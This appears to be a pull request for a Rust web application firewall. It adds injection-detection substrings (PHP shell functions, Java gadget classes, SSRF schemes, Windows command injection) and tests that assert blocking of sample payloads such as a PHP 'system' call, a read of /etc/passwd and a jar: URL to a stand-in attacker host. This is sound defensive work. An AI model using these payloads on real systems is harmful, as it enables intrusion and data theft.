+    "zip://",
+    "compress.",
+    "ssh2.",
+    // Java gadget / reflection class refs (FP on stack traces → aggressive)
+    "java.io.",
+    "java.net.url",
+    "java.lang.process",
+    "java.lang.reflect",
+    "java.lang.class",
+    // Command injection: Windows + bare-metachar sleep
+    "| sleep",
+    "& sleep",
+    "net view",
+    "net user",
+    "dir c:",
+    // Django/ORM + NoSQL lookup injection
+    "__startswith",
+    "__endswith",
+    "__contains\"",
+    "__regex",
+    // SSRF: container/loopback hostnames
+    "host.docker.internal",
+    // PHP open tags + dangerous funcs (decoded form — high-frequency in corpus)
+    "<?php",
+    "<?=",
+    "system(",
+    "shell_exec(",
+    "passthru(",
+    "base64_decode(",
+    "phpinfo(",
+    // Perl/Ruby SSTI interpolation seen across generic
+    "@{[",
+    // SSRF: more internal/abusable URI schemes
+    "file://",
+    "jar:",
+    "ftp://",
 ];
 
 static BALANCED_SCANNER: OnceLock<AhoCorasick> = OnceLock::new();
@@ -1598,6 +1639,54 @@ mod tests {
             WafVerdict::Allow,
             "false positive on empty function"
         );
+    }
+
+    #[test]
+    fn denies_corpus_v2_round_aggressive() {
+        // The corpus-v2 (OWASP CRS + PayloadsAllTheThings) round: high-frequency
+        // real-world misses added to the aggressive set. One assertion per family.
+        let p = aggressive_profile();
+        for body in [
+            &br#"{"x":"<?php system('id'); ?>"}"#[..],   // php tag + func
+            &br#"{"x":"shell_exec('ls')"}"#[..],         // php dangerous func
+            &br#"{"x":"java.lang.Process"}"#[..],        // java gadget class
+            &br#"{"x":"java.io.PrintStream"}"#[..],      // java io class
+            &br#"{"x":"file:///etc/passwd"}"#[..],       // ssrf/lfi scheme
+            &br#"{"x":"jar:http://evil.co/b.zip!a"}"#[..], // ssrf jar scheme
+            &br#"{"x":"& net view"}"#[..],               // windows cmdi
+            &br#"{"x":"| sleep 15"}"#[..],               // metachar sleep
+            &br#"{"name__startswith":"a"}"#[..],         // django/orm lookup injection
+            &br#"{"x":"compress.bzip2://file.bz2"}"#[..], // php stream wrapper
+            &br#"{"x":"@{[ system 'id' ]}"}"#[..],       // perl ssti
+        ] {
+            assert_eq!(
+                validate_request("POST", Some("application/json"), body, &p),
+                WafVerdict::Deny("injection pattern detected"),
+                "corpus-v2 round should block: {:?}",
+                std::str::from_utf8(body).unwrap()
+            );
+        }
+    }
+
+    #[test]
+    fn allows_corpus_v2_round_benign_aggressive() {
+        // Precision guards for the corpus-v2 round: legit prose that name-drops
+        // "system", "file", "java", "process" must NOT trip (the patterns are
+        // anchored to call/scheme syntax, not bare words).
+        let p = aggressive_profile();
+        for body in [
+            &br#"{"q":"how does the file system handle large uploads"}"#[..],
+            &br#"{"q":"a java tutorial for beginners with process diagrams"}"#[..],
+            &br#"{"q":"please ftp the file later, the system looks healthy"}"#[..],
+            &br#"{"q":"sort results by startswith then by name"}"#[..],
+        ] {
+            assert_eq!(
+                validate_request("POST", Some("application/json"), body, &p),
+                WafVerdict::Allow,
+                "false positive on benign prose: {:?}",
+                std::str::from_utf8(body).unwrap()
+            );
+        }
     }
 
     #[test]


### PR DESCRIPTION
Two coupled changes: the honest corpus, and the one targeted round it justified.

## 1. corpus-v2 — the honest set
The v1 hand-curated corpus (200) was a textbook set and **flattered** the WAF (aggressive 85%). corpus-v2 is ~1,060 malicious payloads **extracted** from public corpora + 136 benign.
- **OWASP CRS** regression tests (Apache-2.0) — positive-detection stages only (a stage that expects a rule to fire = a real attack).
- **PayloadsAllTheThings** (MIT) — `Intruder/*.txt` per class.
- Deduped, balanced, capped 130/class. `build-corpus-v2.py` regenerates from clones; `run.py` now takes `WAF_CORPUS=<file>`.

## 2. The round it drove (aggressive only)
The baseline (30.9%) showed *which* real techniques the substring scanner misses, by frequency. One FP-checked round of high-value literals: PHP tags/funcs (`<?php`, `system(`, `shell_exec(`…), Java gadget classes (`java.lang.process`, `java.io.`…), SSRF schemes (`file://`, `jar:`, `ftp://`), Windows cmdi (`net view`…), ORM lookups (`__startswith`…), PHP stream wrappers, Perl SSTI (`@{[`).

## Result (aggressive vs corpus-v2)
| State | Detection | FP |
|---|--:|--:|
| baseline | 30.9% (327/1058) | 0.0% |
| **+ round** | **40.6%** (430/1058) | **0.0%** (0/136) |

java 16→45%, ssrf 12→44%, php 17→33%, generic 15→35%. balanced unchanged (16.8%). Guarded by `denies_corpus_v2_round_aggressive` + `allows_corpus_v2_round_benign_aggressive` (prose name-dropping system/file/java must not trip).

## Why stop here
Residual misses are base64 gadget chains, `${'a'}('id')` variable-function obfuscation, exotic IPv6/decimal/overlong-UTF-8, `while(true)` DoS — normalizer/semantic territory, not cheap literals. The double-decode loop already defeats `%252e%252e`/`%253Cscript%253E`. v2 aggressive is now the real regression number; we raise it via the normalizer, not more patterns.

Source repos cloned at build time, not vendored. v1 `corpus.json` kept as the fast set.

🤖 Generated with [Claude Code](https://claude.com/claude-code)